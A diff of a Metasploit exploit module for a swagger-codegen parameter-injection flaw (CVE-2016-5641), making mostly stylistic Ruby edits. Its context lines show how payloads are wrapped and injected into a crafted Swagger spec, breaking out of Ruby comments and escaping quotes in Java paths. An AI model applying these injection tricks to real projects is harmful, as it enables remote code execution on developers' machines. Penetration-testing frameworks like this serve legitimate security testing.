@@ -43,8 +43,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
           [ 'URL', 'https://www.rapid7.com/blog/post/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
         ],
-        'Platform' => %w{nodejs php java ruby},
-        'Arch' => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ],
         'Targets' => [
           ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
           ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
@@ -79,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def swagger
-    %Q(
+    %(
       {
           "swagger": "2.0",
           "info": {
@@ -145,14 +143,14 @@ class MetasploitModule < Msf::Exploit::Remote
                         payload_suffix
     when 'ruby'
       payload_loc = 'INFO_TITLE'
-      payload_prefix = "=end "
-      payload_suffix = "=begin "
+      payload_prefix = '=end '
+      payload_suffix = '=begin '
       wrapped_payload = payload_prefix + payload.encoded + payload_suffix
     when 'java'
       payload_loc = 'PATH'
       payload_prefix = %q{a\\\"; "}
       p = payload.encoded.gsub(/<%@page import="/, 'import ')
-      p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
+      p = p.gsub(/"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
       p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
       wrapped_payload = payload_prefix + p
     else
